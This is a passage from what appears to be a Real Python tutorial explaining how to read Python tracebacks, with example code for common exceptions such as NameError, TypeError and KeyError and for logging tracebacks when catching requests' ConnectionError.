Under the WOW execution, the unmanaged heap would be used by the WOW environment. In our current example, it consumes around 2 MB of the process memory. This unmanaged heap would never be used when a 32 bit managed application is run directly under 32 bit environment.
Managed heap would be kind enough to stay neutral and consume exactly the same amount of memory, whether it is WOW or direct 32 bit environment.
Private data worth around 18 MB is added to the total memory size of the process when run under WOW, because of it being in WOW mode. If there are additional private data because of the application itself, it would be in addition to this 18MB (in WoW).
The stack’s contribution to the increase in memory, when run over WOW, varies from application to application as it depends on the program length (how long the stack is). As we know, Stacks are used to store function parameters, local function variables and function invocation records (who has invoked the function) for individual threads. If there are 3 threads, there would be 3 different stacks in the stack segment.
When run under WOW, for each thread the stack segment would have to maintain 2 different and independent stacks one as the 32 bit stack and the other as a 64 bit stack. So, if there are 3 threads in an application, there would be 6 different stacks in the stack segment when run on WOW.
This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)
General News Suggestion Question Bug Answer Joke Rant Admin
Man throws away trove of Bitcoin worth $7.5 million
|
http://www.codeproject.com/Articles/526984/32-bit-vs-64-bit-memory?msg=4481660
|
CC-MAIN-2013-48
|
refinedweb
| 2,329
| 58.32
|
In this section, there are three examples of using OpenCV with OpenCL. The first example allows you to check whether the installed SDK is available and obtain useful information about the computing devices that support OpenCL. The second example shows you two versions of the same program using CPU and GPU programming, respectively. The last example is a complete program to detect and mark faces. In addition, a computational comparative is performed.
The following is a simple program that is shown to check your SDK and the available computing devices. This example is called checkOpenCL. It allows you to display the computer devices using the OCL module of OpenCV:
#include <opencv2/opencv.hpp> ...
No credit card required
|
https://www.oreilly.com/library/view/learning-image-processing/9781783287659/ch07s02.html
|
CC-MAIN-2018-47
|
refinedweb
| 117
| 58.48
|
01 April 2010 19:37 [Source: ICIS news]
HOUSTON (ICIS news)--US polyethylene (PE) prices were steady going into April amid continued supply allocations by some producers and strong ethylene pricing, buyers said on Thursday.
Buyers expected flat or lower prices in April, with little support seen for producers’ 5-cent/lb ($110/tonne, €81/tonne) price increase nominations.
“I’m thinking April is flat at this stage. There is no sentiment for an increase next month,” a source said.
“But who knows what will happen, what incidents will come forth,” the buyer added, alluding to the uneven operating environment for the US Gulf ethylene industry during the first quarter.
While buyers agreed that prices were primed to drop at some point, the timing of the decrease was an open question.
“We think there is a chance of the price weakening in late April as suppliers start recognising that the price will fall in May and they want to start moving product ahead of the downward curve,” a source said.
Other buyers saw indications that prices could drop in April, but more likely in May or June, when the supply chain will have had more time to recover from first-quarter disruptions.
Market participants said double-digit price drops were possible later in the second quarter.
?xml:namespace>
Major US PE producers include Dow Chemical,
($1 = €0.74)
|
http://www.icis.com/Articles/2010/04/01/9347971/us-pe-outlook-steady-for-april-amid-supply-allocations-buyers.html
|
CC-MAIN-2014-52
|
refinedweb
| 228
| 57.91
|
This is a guest post from Simon Grimm, Ionic Developer Expert and educator at the Ionic Academy. Simon also writes about Ionic frequently on his blog Devdactic.
In this tutorial we will look at the new navigation system inside Ionic Framework 4.0 to learn how to use the powerful CLI, to understand how your Ionic 3 logic can be converted to v4, and, finally, the best way to protect pages inside your app if you plan to use an authentication system at any point.
I am Number 4
There is so much to talk about if we want to cover all the Ionic 4 changes, but for today let’s just focus on one of the key aspects of your app: Navigation!
With Ionic 4, your app is using Angular, which already comes with some new additions itself. But now Ionic is also using the standard Angular Router in the background. This means, instead of pushing and popping around inside your app, we have to define paths that are aligned with our pages.
If you are new to this concept, it might look a little scary and you may think, “Why so much code, everything was so easy before…,” but trust me, by the end of this post, you’ll love the new routing and you’ll be ready to migrate your Ionic 3 apps to the new version.
For now, let’s start with a blank Ionic 4 app so we can implement some navigation concepts. Go ahead and run:
npm install -g [email protected] ionic start goFourIt blank
This will create a new project which you can directly run with
ionic serve once you are inside that folder. It should bring up a blank app in your browser with just one page.:
import { NgModule } from '@angular/core'; import { Routes, RouterModule } from '@angular/router'; const routes: Routes = [ { path: '', redirectTo: 'home', pathMatch: 'full' }, { path: 'home', loadChildren: './home/home.module#HomePageModule' }, ]; @NgModule({ imports: [RouterModule.forRoot(routes)], exports: [RouterModule] }) export class AppRoutingModule { }:
<body> <app-root></app-root> </body>
The only thing we display is an app-root, which is still not very clear. This app root is replaced by the first real HTML of our app, which is always inside the app/app.component.html:
<ion-app> <ion-router-outlet></ion-router-outlet> </ion-app>. Now, you are hopefully ready to navigate the change a bit better.
Adding New Pages with the CLI
Because a single page is not yet an app, we need more pages! To do so, you can use the Ionic CLI, which provides a wrapper for the Angular CLI. Right now, we could add 2 additional pages like this:
ionic g page pages/login ionic g page pages/dashboard ionic g page pages/details
This command tells the CLI to generate (g) a new page at the path pages/login, pages/dashboard and pages/details. It doesn’t matter that the folder ‘pages’ does not yet exist, the CLI will automatically create them for you.
There’s a whole lot more you can do with the CLI, just take a look at the documentation.
For now, let’s get back to our main goal of implementing navigation inside our app.
After creating pages with the CLI your app-routing.module.ts will automatically be changed, which may or may not help you in some cases. Right now, it also contains routing information for the three new pages we added with the according path of their module.
Changing Your Entry & Navigating (a.k.a Push & Pop)
One thing I often do with my apps is change the initial page to be a different component. To change this, we can simply remove the routing information for the home page, delete its folder, and change the redirect to point to the login page we generated earlier.
Once a user is logged in, the app should then display our dashboard page. The routing for this is fine, so far, and we can leave it like it is.
For the detail page we generated, we do want one addition: URL parameters. Say that you want to pass data from one page to another. To do this, we’d use URL parameters and specify a dynamic slug in the path. For this routing setup, we’ll add
:myid.
Your routing should now look like this inside your app-routing.module.ts:' } ]; @NgModule({ imports: [RouterModule.forRoot(routes)], exports: [RouterModule] }) export class AppRoutingModule { }
With previous Ionic versions you could also supply complete objects with a lot of information to another page, but with the new version this has changed. By using the URL routing, you can (and should) only pass something like an objects ID (to be used in a HTTP request) to the following page.
In order to get the values you need on that page later, simply use a service that holds your information or makes a HTTP request and returns the right info for a given key at any time.
All routing logic is officially in place, so now we only need to add a few buttons to our app that allow us to move around. Let’s start by adding a first button to our pages/login/login.page.html:
<ion-header> <ion-toolbar <ion-title>Login</ion-title> </ion-toolbar> </ion-header> <ion-content padding> <ion-button Login </ion-button> </ion-content>
We add a block button which has two important properties:
routerLink: The link/path that should be opened
routerDirection: Determines the animation that takes place when the page changes
After a login, you most certainly want to ditch your initial page and start again with the inside area as a new starting point. In that case, we can use the direction “root,” which looks like replacing the whole view.
If you want to animate forward or backward, you would use forward/back instead. This is what we can add now, because we are already able to move from login to our dashboard. So, let’s add the next two more buttons to the pages/dashboard/dashboard.page.html:
<ion-header> <ion-toolbar <ion-title>Dashboard</ion-title> </ion-toolbar> </ion-header> <ion-content padding> <ion-button Details </ion-button> <ion-button Logout </ion-button> </ion-content>
This is the same procedure as before—both have the link, but the first button will bring us deeper into our app by going to the details page and using “42” as the ID.
The second button brings us back to the previous login page again by animating a complete exchange of pages.
You can see the difference of the animations below:
Of course, you can also dynamically add the ID for the details page or construct the link like this if you have a variable
foo inside your class:
<ion-button
To wrap things up we need to somehow get the value we passed inside our details page, plus your users also need a way to go back from that page to the dashboard.
First things first, getting the value of the path is super easy. We can inject the
ActivatedRoute and grab the value inside our pages/details/details.page.ts like this:
import { Component, OnInit } from '@angular/core'; import { ActivatedRoute } from '@angular/router'; @Component({ selector: 'app-details', templateUrl: './details.page.html', styleUrls: ['./details.page.scss'], }) export class DetailsPage implements OnInit { myId = null; constructor(private activatedRoute: ActivatedRoute) { } ngOnInit() { this.myId = this.activatedRoute.snapshot.paramMap.get('myid'); } }
By doing this, we can get the value, which is part of the
paramMapof the current route. Now that we have stored the value, we can also show it inside the current view, plus add a button to the top bar that allows the user to navigate back.
With previous Ionic versions that back button was automatically added. Meaning, the button was there even if we didn’t want it and it was difficult to customize. But with the release of Ionic 4.0, we can control this by adding it ourselves. At the same time, we can also define a
defaultHref. This way, if we load our app on that specific page and have no app history, we can navigate back and still have our app function.
The markup for our pages/details/details.page.html looks now like this:
<ion-header> <ion-toolbar <ion-buttons <ion-back-button</ion-back-button> </ion-buttons> <ion-title>Details</ion-title> </ion-toolbar> </ion-header> <ion-content padding> My ID is: {{ myId }} </ion-content>
As you can see, this back-button will now always bring us back to the dashboard, even if we don’t have any history at that point.
By now, the whole navigation setup in our app works pretty flawlessly, but what if we wanted to restrict some routes to only authenticated user? Let’s go ahead and add this.
Protecting Pages with Guards.
When you deploy your Ionic app as a website, all URLs, right now, could be directly accessed by a user. But here’s an easy way to change it:
We can create something called guard that checks a condition and returns true/false, which allows users to access that page or not. You can generate a guard inside your project with the Ionic CLI:
ionic g guard guards/auth
This generates a new file with the standard guard structure of Angular. Let’s edit guards/auth.guard.ts and change it’s content to:
import { Injectable } from '@angular/core'; import { CanActivate, ActivatedRouteSnapshot, RouterStateSnapshot } from '@angular/router'; import { Observable } from 'rxjs'; @Injectable({ providedIn: 'root' }) export class AuthGuard implements CanActivate { canActivate( next: ActivatedRouteSnapshot, state: RouterStateSnapshot): Observable<boolean> | Promise<boolean> | boolean { let userAuthenticated = false; // Get the current authentication state from a Service! if (userAuthenticated) { return true; } else { return false; } } }
The guard only has the
canActivate() method in which you return a boolean if the page can be accessed. In this code, we simply return false, but a real guard would make an API call or check a token value.
By default this guard is not yet enabled, but now the circle closes as we come back to our initial app routing. So, open the app-routing.module.ts once again and change it to:
import { AuthGuard } from './guards/auth.guard';', canActivate: [AuthGuard] } ]; @NgModule({ imports: [RouterModule.forRoot(routes)], exports: [RouterModule] }) export class AppRoutingModule { }
You can add an array of these guards to your pages and check for different conditions, but the idea is the same: Can this route be activated by this user?
Because we set it to false without any further checks, right now we could not navigate from the dashboard to the details page.
There’s also more information on guards and resolver functions inside the Ionic Academy, so check it out here!
Where to Go From Here?
We’ve only touched on a few basic elements of the (new) Angular routing concepts that are now applied in Ionic 4, but I hope it was helpful. Now that you’ve walked through this process, this concept should be a lot easier to understand and manage given that your navigation is not scrambled across various pages inside your app.
Also, securing your app or resolving additional data before entering a page becomes a lot easier with the direct paths and the use of child routing groups.
If you’re interested in the concept of routing, or would like to see more explanations around features like the Tabs, Side Menu, or child routes and modals, consider becoming an Ionic Academy member, today!
When you join, you’ll gain access to countless resources that will help you learn everything Ionic, from in-depth training resources to video courses, plus support from an incredibly helpful community.
Until next time, happy coding!
|
https://blog.ionicframework.com/navigating-the-change-with-ionic-4-and-angular-router/
|
CC-MAIN-2019-18
|
refinedweb
| 1,947
| 59.53
|
Main(string[] args)
{]
Let.
LINQ method
Optimization
Cast
If the data source already implements IEnumerable<T> for the given T, when the sequence of data is returned without a cast.
Contains
If the data source implements the ICollection or ICollection<T> interface, the corresponding method of the interface is used.
Count
ElementAt
If the data source implements the IList or IList<T> interface, the interface’s Count method and indexing operations are used.
ElementAtOrDefault
First
FirstOrDefault
LastOrDefault
Single
SingleOrDefault]
To make the hex string use lower-case letters instead of upper-case, replace the single line inside the for loop with this line:
sb.Append(hash[i].ToString("x2"));
The difference is the ToString method parameter.
Sometimes,.
Often, you need a way to monitor your applications once they are running on the server or even at the customer site -- away from your Visual Studio debugger. In those situations, it is often helpful to have a simple routine that you can use to log messages to a text file for later analysis.
Here’s a simple routine that has helped me a lot for example when writing server applications without an user interface:
using System.IO;
public string GetTempPath()
{
string path = System.Environment.GetEnvironmentVariable("TEMP");
if (!path.EndsWith("\\")) path += "\\";
return path;
}
public void LogMessageToFile(string msg)
{
System.IO.StreamWriter sw = System.IO.File.AppendText(
GetTempPath() + "My Log File.txt");
try
{
string logLine = System.String.Format(
"{0:G}: {1}.", System.DateTime.Now, msg);
sw.WriteLine(logLine);
}
finally
{
sw.Close();
}
}
With this simple method, all you need to do is to pass in a string like this:
LogMessageToFile("Hello, World");
The current date and time are automatically inserted to the log file along with your message.
When]
tip]).
Strictly speaking you can't, since const can only be applied to a field or local whose value is known at compile time.
In both the lines below, the right-hand is not a constant expression (not in C#).
const int [] constIntArray = newint [] {2, 3, 4};
// error CS0133: The expression being assigned to 'constIntArray' must be constant
const int [] constIntArrayAnother = {2, 3, 4};
// error CS0623: Array initializers can only be used in a variable or field
// initializer. Try using a new expression instead.
However, there are some workarounds, depending on what it is you want to achieve.
If want a proper .NET array (System.Array) that cannot be reassigned, then static readonly will do for you.
static readonly int [] constIntArray = new int[] {1, 2, 3};
If, on the other hand, you really need a const set of values (say as an argument to an attribute constructor), then - if you can limit yourself to integral types - an enum would serve you well.
For example:
[Flags]
public enum Role
{
Administrator = 1,
BackupOperator = 2,
// etc.
}
public class RoleAttribute : Attribute
{
public RoleAttribute()
{
CreateRole = DefaultRole;
}
public RoleAttribute(Role role)
{
CreateRole = role;
}
public Role CreateRole
{
get { return this.createRole; }
set { this.createRole = value; }
}
private Role createRole = 0;
public const Role DefaultRole = Role.Administrator
| Role.BackupOperator;
}
[RoleAttribute(RoleAttribute.DefaultRole)]
public class DatabaseAccount
{
//..............
}
RoleAttribute, instead of taking an array, would only take a single argument of flags (appropriately or-ed). If the underlying type of the Role enum is long or ulong, that gives you 64 different Roles.
[Author: SantoshZ]
Use.
Now that Whidbey has been out in Beta for more than a few months, it seems worth revisiting some frequently asked questions which have different (better?) answers now.
In Everett (v7.1) the answer used to be No.
However, in Whidbey (v8.0), the answer is Yes (and No).
For the yes part of the answer, after building, go to the Output Window, select "Show Output from: Build", and about half way down you will see a section like this:.
Now for the no part of the answer. The project system does not actually execute this command line as part of the build process. As the output says, the IDE directly calls its own in-process compiler to perform the equivalent. However, in all cases, you should get the same results using the command line suggested in the output window. If you don't, you could be looking at a bug.
Note: before you cut and paste the build output to the command line, remember to add the path to CSC.EXE
[Author: SantoshZ]
Given
|
http://blogs.msdn.com/CSharpFAQ/
|
crawl-002
|
refinedweb
| 713
| 57.47
|
Watch Now This tutorial has a related video course created by the Real Python team. Watch it together with the written tutorial to deepen your understanding: tutorial, you’ll be able to:
- Make sense of the next traceback you see
- Recognize some of the more common tracebacks
- Log a traceback successfully while still handling the exception
Free Bonus: Click here to get our free Python Cheat Sheet that shows you the basics of Python 3, like working with data types, dictionaries, lists, and Python functions.
What Is a Python Traceback?
A traceback is a report containing the function calls made in your code at a specific point. Tracebacks are known by many names, including stack trace, stack traceback, backtrace, and maybe others. In Python, the term used is traceback.
When your program results in an exception, Python will print the current traceback to help you know what went wrong. Below is an example to illustrate this situation:
# example.py def greet(someone): print('Hello, ' + someon) greet('Chad')
Here,
greet() gets called with the parameter
someone. However, in
greet(), that variable name is not used. Instead, it has been misspelled as
someon in the
print() call.
Note: This tutorial assumes you understand Python exceptions. If you are unfamiliar or just want a refresher, then you should check out Python Exceptions: An Introduction.
When you run this program, you’ll get the following traceback:
$ python example.py Traceback (most recent call last): File "/path/to/example.py", line 4, in <module> greet('Chad') File "/path/to/example.py", line 2, in greet print('Hello, ' + someon) NameError: name 'someon' is not defined
This traceback output has all of the information you’ll need to diagnose the issue. The final line of the traceback output tells you what type of exception was raised along with some relevant information about that exception. The previous lines of the traceback point out the code that resulted in the exception being raised.
In the above traceback, the exception was a
NameError, which means that there is a reference to some name (variable, function, class) that hasn’t been defined. In this case, the name referenced is
someon.
The final line in this case has enough information to help you fix the problem. Searching the code for the name
someon, which is a misspelling, will point you in the right direction. Often, however, your code is a lot more complicated.
How Do You Read a Python Traceback?
The Python traceback contains a lot of helpful information when you’re trying to determine the reason for an exception being raised in your code. In this section, you’ll walk through different tracebacks in order to understand the different bits of information contained in a traceback.
Python Traceback Overview
There are several sections to every Python traceback that are important. The diagram below highlights the various parts:
In Python, it’s best to read the traceback from the bottom up:
Blue box: The last line of the traceback is the error message line. It contains the exception name that was raised.
Green box: After the exception name is the error message. This message usually contains helpful information for understanding the reason for the exception being raised.
Yellow box: Further up the traceback are the various function calls moving from bottom to top, most recent to least recent. These calls are represented by two-line entries for each call. The first line of each call contains information like the file name, line number, and module name, all specifying where the code can be found.
Red underline: The second line for these calls contains the actual code that was executed.
There are a few differences between traceback output when you’re executing your code in the command-line and running code in the REPL. Below is the same code from the previous section executed in a REPL and the resulting traceback output:
>>> def greet(someone): ... print('Hello, ' + someon) ... >>> greet('Chad') Traceback (most recent call last): File "<stdin>", line 1, in <module> File "<stdin>", line 2, in greet NameError: name 'someon' is not defined
Notice that in place of file names, you get
"<stdin>". This makes sense since you typed the code in through standard input. Also, the executed lines of code are not displayed in the traceback.
Note: If you are used to seeing stack traces in other programming languages, then you’ll notice a major difference in the way a Python traceback looks in comparison. Most other languages print the exception at the top and then go from top to bottom, most recent calls to least recent.
It has already been said, but just to reiterate, a Python traceback should be read from bottom to top. This is very helpful since the traceback is printed out and your terminal (or wherever you are reading the traceback) usually ends up at the bottom of the output, giving you the perfect place to start reading the traceback.
Specific Traceback Walkthrough
Going through some specific traceback output will help you better understand and see what information the traceback will give you.
The code below is used in the examples following to illustrate the information a Python traceback gives you:
# greetings.py def who_to_greet(person): return person if person else input('Greet who? ') def greet(someone, greeting='Hello'): print(greeting + ', ' + who_to_greet(someone)) def greet_many(people): for person in people: try: greet(person) except Exception: print('hi, ' + person)
Here,
who_to_greet() takes a value,
person, and either returns it or prompts for a value to return instead.
Then,
greet() takes a name to be greeted,
someone, and an optional
greeting value and calls
print().
who_to_greet() is also called with the
someone value passed in.
Finally,
greet_many() will iterate over the list of
people and call
greet(). If there is an exception raised by calling
greet(), then a simple backup greeting is printed.
This code doesn’t have any bugs that would result in an exception being raised as long as the right input is provided.
If you add a call to
greet() to the bottom of
greetings.py and specify a keyword argument that it isn’t expecting (for example
greet('Chad', greting='Yo')), then you’ll get the following traceback:
$ python example.py Traceback (most recent call last): File "/path/to/greetings.py", line 19, in <module> greet('Chad', greting='Yo') TypeError: greet() got an unexpected keyword argument 'greting'
Once again, with a Python traceback, it’s best to work backward, moving up the output. Starting at the final line of the traceback, you can see that the exception was a
TypeError. The messages that follow the exception type, everything after the colon, give you some great information. It tells you that
greet() was called with a keyword argument that it didn’t expect. The unknown argument name is also given to you:
greting.
Moving up, you can see the line that resulted in the exception. In this case, it’s the
greet() call that we added to the bottom of
greetings.py.
The next line up gives you the path to the file where the code exists, the line number of that file where the code can be found, and which module it’s in. In this case, because our code isn’t using any other Python modules, we just see
<module> here, meaning that this is the file that is being executed.
With a different file and different input, you can see the traceback really pointing you in the right direction to find the issue. If you are following along, remove the buggy
greet() call from the bottom of
greetings.py and add the following file to your directory:
# example.py from greetings import greet greet(1)
Here you’ve set up another Python file that is importing your previous module,
greetings.py, and using
greet() from it. Here’s what happens if you now run
example.py:
$ python example.py Traceback (most recent call last): File "/path/to/example.py", line 3, in <module> greet(1) File "/path/to/greetings.py", line 5, in greet print(greeting + ', ' + who_to_greet(someone)) TypeError: must be str, not int
The exception raised in this case is a
TypeError again, but this time the message is a little less helpful. It tells you that somewhere in the code it was expecting to work with a string, but an integer was given.
Moving up, you see the line of code that was executed. Then the file and line number of the code. This time, however, instead of
<module>, we get the name of the function that was being executed,
greet().
Moving up to the next executed line of code, we see our problematic
greet() call passing in an integer.
Sometimes after an exception is raised, another bit of code catches that exception and also results in an exception. In these situations, Python will output all exception tracebacks in the order in which they were received, once again ending in the most recently raise exception’s traceback.
Since this can be a little confusing, here’s an example. Add a call to
greet_many() to the bottom of
greetings.py:
# greetings.py ... greet_many(['Chad', 'Dan', 1])
This should result in printing greetings to all three people. However, if you run this code, you’ll see an example of the multiple tracebacks being output:
$ python greetings.py Hello, Chad Hello, Dan Traceback (most recent call last): File "greetings.py", line 10, in greet_many greet(person) File "greetings.py", line 5, in greet print(greeting + ', ' + who_to_greet(someone)) TypeError: must be str, not int During handling of the above exception, another exception occurred: Traceback (most recent call last): File "greetings.py", line 14, in <module> greet_many(['Chad', 'Dan', 1]) File "greetings.py", line 12, in greet_many print('hi, ' + person) TypeError: must be str, not int
Notice the highlighted line starting with
During handling in the output above. In between all tracebacks, you’ll see this line. Its message is very clear, while your code was trying to handle the previous exception, another exception was raised.
Note: Python’s feature of displaying the previous exceptions tracebacks were added in Python 3. In Python 2, you’ll only get the last exception’s traceback.
You have seen the previous exception before, when you called
greet() with an integer. Since we added a
1 to the list of people to greet, we can expect the same result. However, the function
greet_many() wraps the
greet() call in a
try and
except block. Just in case
greet() results in an exception being raised,
greet_many() wants to print a default greeting.
The relevant portion of
greetings.py is repeated here:
def greet_many(people): for person in people: try: greet(person) except Exception: print('hi, ' + person)
So when
greet() results in the
TypeError because of the bad integer input,
greet_many() handles that exception and attempts to print a simple greeting. Here the code ends up resulting in another, similar, exception. It’s still attempting to add a string and an integer.
Seeing all of the traceback output can help you see what might be the real cause of an exception. Sometimes when you see the final exception raised, and its resulting traceback, you still can’t see what’s wrong. In those cases, moving up to the previous exceptions usually gives you a better idea of the root cause.
What Are Some Common Tracebacks in Python?
Knowing how to read a Python traceback when your program raises an exception can be very helpful when you’re programming, but knowing some of the more common tracebacks can also speed up your process.
Here are some common exceptions you might come across, the reasons they get raised and what they mean, and the information you can find in their tracebacks.
AttributeError
The
AttributeError is raised when you try to access an attribute on an object that doesn’t have that attribute defined. The Python documentation defines when this exception is raised:
Raised when an attribute reference or assignment fails. (Source)
Here’s an example of the
AttributeError being raised:
>>> an_int = 1 >>> an_int.an_attribute Traceback (most recent call last): File "<stdin>", line 1, in <module> AttributeError: 'int' object has no attribute 'an_attribute'
The error message line for an
AttributeError tells you that the specific object type,
int in this case, doesn’t have the attribute accessed,
an_attribute in this case. Seeing the
AttributeError in the error message line can help you quickly identify which attribute you attempted to access and where to go to fix it.
Most of the time, getting this exception indicates that you are probably working with an object that isn’t the type you were expecting:
>>> a_list = (1, 2) >>> a_list.append(3) Traceback (most recent call last): File "<stdin>", line 1, in <module> AttributeError: 'tuple' object has no attribute 'append'
In the example above, you might be expecting
a_list to be of type
list, which has a method called
.append(). When you receive the
AttributeError exception and see that it was raised when you are trying to call
.append(), that tells you that you probably aren’t dealing with the type of object you were expecting.
Often, this happens when you are expecting an object to be returned from a function or method call to be of a specific type, and you end up with an object of type
None. In this case, the error message line will read,
AttributeError: 'NoneType' object has no attribute 'append'.
ImportError
The
ImportError is raised when something goes wrong with an import statement. You’ll get this exception, or its subclass
ModuleNotFoundError, if the module you are trying to import can’t be found or if you try to import something from a module that doesn’t exist in the module. The Python documentation defines when this exception is raised:
Raised when the import statement has troubles trying to load a module. Also raised when the ‘from list’ in
from ... importhas a name that cannot be found. (Source)
Here’s an example of the
ImportError and
ModuleNotFoundError being raised:
>>> import asdf Traceback (most recent call last): File "<stdin>", line 1, in <module> ModuleNotFoundError: No module named 'asdf' >>> from collections import asdf Traceback (most recent call last): File "<stdin>", line 1, in <module> ImportError: cannot import name 'asdf'
In the example above, you can see that attempting to import a module that doesn’t exist,
asdf, results in the
ModuleNotFoundError. When attempting to import something that doesn’t exist,
asdf, from a module that does exists,
collections, this results in an
ImportError. The error message lines at the bottom of the tracebacks tell you which thing couldn’t be imported,
asdf in both cases.
IndexError
The
IndexError is raised when you attempt to retrieve an index from a sequence, like a
list or a
tuple, and the index isn’t found in the sequence. The Python documentation defines when this exception is raised:
Raised when a sequence subscript is out of range. (Source)
Here’s an example that raises the
IndexError:
>>> a_list = ['a', 'b'] >>> a_list[3] Traceback (most recent call last): File "<stdin>", line 1, in <module> IndexError: list index out of range
The error message line for an
IndexError doesn’t give you great information. You can see that you have a sequence reference that is
out of range and what the type of the sequence is, a
list in this case. That information, combined with the rest of the traceback, is usually enough to help you quickly identify how to fix the issue.
KeyError
Similar to the
IndexError, the
KeyError is raised when you attempt to access a key that isn’t in the mapping, usually a
dict. Think of this as the
IndexError but for dictionaries. The Python documentation defines when this exception is raised:
Raised when a mapping (dictionary) key is not found in the set of existing keys. (Source)
Here’s an example of the
KeyError being raised:
>>> a_dict['b'] Traceback (most recent call last): File "<stdin>", line 1, in <module> KeyError: 'b'
The error message line for a
KeyError gives you the key that could not be found. This isn’t much to go on but, combined with the rest of the traceback, is usually enough to fix the issue.
For an in-depth look at
KeyError, take a look at Python KeyError Exceptions and How to Handle Them.
NameError
The
NameError is raised when you have referenced a variable, module, class, function, or some other name that hasn’t been defined in your code. The Python documentation defines when this exception is raised:
Raised when a local or global name is not found. (Source)
In the code below,
greet() takes a parameter
person. But in the function itself, that parameter has been misspelled to
persn:
>>> def greet(person): ... print(f'Hello, {persn}') >>> greet('World') Traceback (most recent call last): File "<stdin>", line 1, in <module> File "<stdin>", line 2, in greet NameError: name 'persn' is not defined
The error message line of the
NameError traceback gives you the name that is missing. In the example above, it’s a misspelled variable or parameter to the function that was passed in.
A
NameError will also be raised if it’s the parameter that you misspelled:
>>> def greet(persn): ... print(f'Hello, {person}') >>> greet('World') Traceback (most recent call last): File "<stdin>", line 1, in <module> File "<stdin>", line 2, in greet NameError: name 'person' is not defined
Here, it might seem as though you’ve done nothing wrong. The last line that was executed and referenced in the traceback looks good. If you find yourself in this situation, then the thing to do is to look through your code for where the
person variable is used and defined. Here you can quickly see that the parameter name was misspelled.
SyntaxError
The
SyntaxError is raised when you have incorrect Python syntax in your code. The Python documentation defines when this exception is raised:
Raised when the parser encounters a syntax error. (Source)
Below, the problem is a missing colon that should be at the end of the function definition line. In the Python REPL, this syntax error is raised right away after hitting enter:
>>> def greet(person) File "<stdin>", line 1 def greet(person) ^ SyntaxError: invalid syntax
The error message line of the
SyntaxError only tells you that there was a problem with the syntax of your code. Looking into the lines above gives you the line with the problem and usually a
^ (caret) pointing to the problem spot. Here, the colon is missing from the function’s
def statement.
Also, with
SyntaxError tracebacks, the regular first line
Traceback (most recent call last): is missing. That is because the
SyntaxError is raised when Python attempts to parse your code, and the lines aren’t actually being executed.
TypeError
The
TypeError is raised when your code attempts to do something with an object that can’t do that thing, such as trying to add a string to an integer or calling
len() on an object where its length isn’t defined. The Python documentation defines when this exception is raised:
Raised when an operation or function is applied to an object of inappropriate type. (Source)
Following are several examples of the
TypeError being raised:
>>> 1 + '1' Traceback (most recent call last): File "<stdin>", line 1, in <module> TypeError: unsupported operand type(s) for +: 'int' and 'str' >>> '1' + 1 Traceback (most recent call last): File "<stdin>", line 1, in <module> TypeError: must be str, not int >>> len(1) Traceback (most recent call last): File "<stdin>", line 1, in <module> TypeError: object of type 'int' has no len()
All of the above examples of raising a
TypeError results in an error message line with different messages. Each of them does a pretty good job of informing you of what is wrong.
The first two examples attempt to add strings and integers together. However, they are subtly different:
- The first is trying to add a
strto an
int.
- The second is trying to add an
intto a
str.
The error message lines reflect these differences.
The last example attempts to call
len() on an
int. The error message line tells you that you can’t do that with an
int.
ValueError
The
ValueError is raised when the value of the object isn’t correct. You can think of this as an
IndexError that is raised because the value of the index isn’t in the range of the sequence, only the
ValueError is for a more generic case. The Python documentation defines when this exception is raised:
Raised when an operation or function receives an argument that has the right type but an inappropriate value, and the situation is not described by a more precise exception such as
IndexError. (Source)
Here are two examples of
ValueError being raised:
>>> a, b, c = [1, 2] Traceback (most recent call last): File "<stdin>", line 1, in <module> ValueError: not enough values to unpack (expected 3, got 2) >>> a, b = [1, 2, 3] Traceback (most recent call last): File "<stdin>", line 1, in <module> ValueError: too many values to unpack (expected 2)
The
ValueError error message line in these examples tells you exactly what the problem is with the values:
In the first example, you are trying to unpack too many values. The error message line even tells you that you were expecting to unpack 3 values but got 2 values.
In the second example, the problem is that you are getting too many values and not enough variables to unpack them into.
How Do You Log a Traceback?
Getting an exception and its resulting Python traceback means you need to decide what to do about it. Usually fixing your code is the first step, but sometimes the problem is with unexpected or incorrect input. While it’s good to provide for those situations in your code, sometimes it also makes sense to silence or hide the exception by logging the traceback and doing something else.
Here’s a more real-world example of code that needs to silence some Python tracebacks. This example uses the
requests library. You can find out more about it in Python’s Requests Library (Guide):
# urlcaller.py import sys import requests response = requests.get(sys.argv[1]) print(response.status_code, response.content)
This code works well. When you run this script, giving it a URL as a command-line argument, it will call the URL and then print the HTTP status code and the content from the response. It even works if the response was an HTTP error status:
$ python urlcaller.py 200 b'' $ python urlcaller.py 500 b''
However, sometimes the URL your script is given to retrieve doesn’t exist, or the host server is down. In those cases, this script will now raise an uncaught
ConnectionError exception and print a traceback:
$ python urlcaller.py ... During handling of the above exception, another exception occurred: Traceback (most recent call last): File "urlcaller.py", line 5, in <module> response = requests.get(sys.argv[1]) File "/path/to/requests/api.py", line 75, in get return request('get', url, params=params, **kwargs) File "/path/to/requests/api.py", line 60, in request return session.request(method=method, url=url, **kwargs) File "/path/to/requests/sessions.py", line 533, in request resp = self.send(prep, **send_kwargs) File "/path/to/requests/sessions.py", line 646, in send r = adapter.send(request, **kwargs)',))
The Python traceback here can be very long with many other exceptions being raised and finally resulting in the
ConnectionError being raised by
requests itself. If you move up the final exceptions traceback, you can see that the problem all started in our code with line 5 of
urlcaller.py.
If you wrap the offending line in a
try and
except block, catching the appropriate exception will allow your script to continue to work with more inputs:
# urlcaller.py ... try: response = requests.get(sys.argv[1]) except requests.exceptions.ConnectionError: print(-1, 'Connection Error') else: print(response.status_code, response.content)
The code above uses an
else clause with the
try and
except block. If you’re unfamiliar with this feature of Python, then check out the section on the
else clause in Python Exceptions: An Introduction.
Now when you run the script with a URL that will result in a
ConnectionError being raised, you’ll get printed a
-1 for the status code, and the content
Connection Error:
$ python urlcaller.py -1 Connection Error
This works great. However, in most real systems, you don’t want to just silence the exception and resulting traceback, but you want to log the traceback. Logging tracebacks allows you to have a better understanding of what goes wrong in your programs.
Note: To learn more about Python’s logging system, check out Logging in Python.
You can log the traceback in the script by importing the
logging package, getting a logger, and calling
.exception() on that logger in the
except portion of the
try and
except block. Your final script should look something like the following code:
# urlcaller.py import logging import sys import requests logger = logging.getLogger(__name__) try: response = requests.get(sys.argv[1]) except requests.exceptions.ConnectionError as e: logger.exception() print(-1, 'Connection Error') else: print(response.status_code, response.content)
Now when you run the script for a problematic URL, it will print the expected
-1 and
Connection Error, but it will also log the traceback:
$ python urlcaller.py ...',)) -1 Connection Error
By default, Python will send log messages to standard error (
